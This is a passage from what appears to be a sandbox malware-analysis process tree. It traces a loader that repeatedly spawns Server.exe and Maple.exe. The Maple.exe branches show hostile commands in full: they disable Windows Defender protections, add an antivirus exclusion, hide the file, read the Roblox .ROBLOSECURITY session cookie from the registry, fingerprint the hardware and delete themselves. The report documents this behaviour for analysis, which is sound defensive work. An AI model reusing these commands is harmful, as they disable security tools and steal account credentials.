                                                                                                                                                                                                                                                                                                                                                                    PID:3916
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                      ping localhost
                                                                                                                                                                                                                                                                                                                                                                      51⤵
                                                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                      PID:904
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                  49⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                  PID:1092
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                    PID:3436
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:3208
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                      50⤵
                                                                                                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                      PID:1812
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                        51⤵
                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                        PID:2368
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                        51⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1272
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                          51⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                          PID:1300
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                            52⤵
                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                            PID:4780
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                            52⤵
                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                            PID:4496
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                              "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                              53⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2148
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                53⤵
                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                PID:1152
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                                                                                                53⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2448
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                                                                  53⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                  PID:4048
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                                                  53⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                  PID:3684
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                                                  53⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:2112
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                    "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                                                                                                                                    53⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2240
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                      "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                                                                                                      53⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1912
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                        "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                                        53⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:2668
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                          PID:2440
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                          "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Detects videocard installed
                                                                                                                                                                                                                                                                                                                                                                                          PID:1164
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                          PID:1580
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                            ping localhost
                                                                                                                                                                                                                                                                                                                                                                                            54⤵
                                                                                                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                            PID:3912
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                        52⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                        PID:2876
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                          PID:1088
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1260
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                            53⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                            PID:2448
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                              54⤵
                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                              PID:1660
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                              54⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                              PID:1452
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                                                55⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3676
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  55⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                                                                                                                  55⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1300
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                                                                                    55⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3896
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                                                                    55⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2704
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                                                                    55⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3824
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                                                                                                                                                      55⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:3632
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                                                                                                                        55⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:960
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                                                          55⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4464
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                                                                                                                            55⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2724
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                                                                                                            55⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Detects videocard installed
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1884
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                                                                                                                                            55⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1664
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                              ping localhost
                                                                                                                                                                                                                                                                                                                                                                                                              56⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1008
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          54⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3212
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            55⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1084
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            55⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1584
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              55⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3908
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4772
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1708
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:920
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                    57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:628
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                    57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3212
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                                                                      58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1156
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:672
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                                                                                                                                        58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1912
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                                                                                                          58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4316
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                                                                                          58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2280
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                                                                                          58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2884
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                                                                                                                                                                            58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1308
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                                                                                                                                              58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1996
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                                                                                58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1680
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                                                                                                                                                  58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1164
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                                                                                                                                  58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3228
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                                                                                                                                                                  58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4904
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                    ping localhost
                                                                                                                                                                                                                                                                                                                                                                                                                                    59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1528
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:448
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4996
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1984
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                    58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4316
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3964
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3824
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1764
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4524
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          60⤵
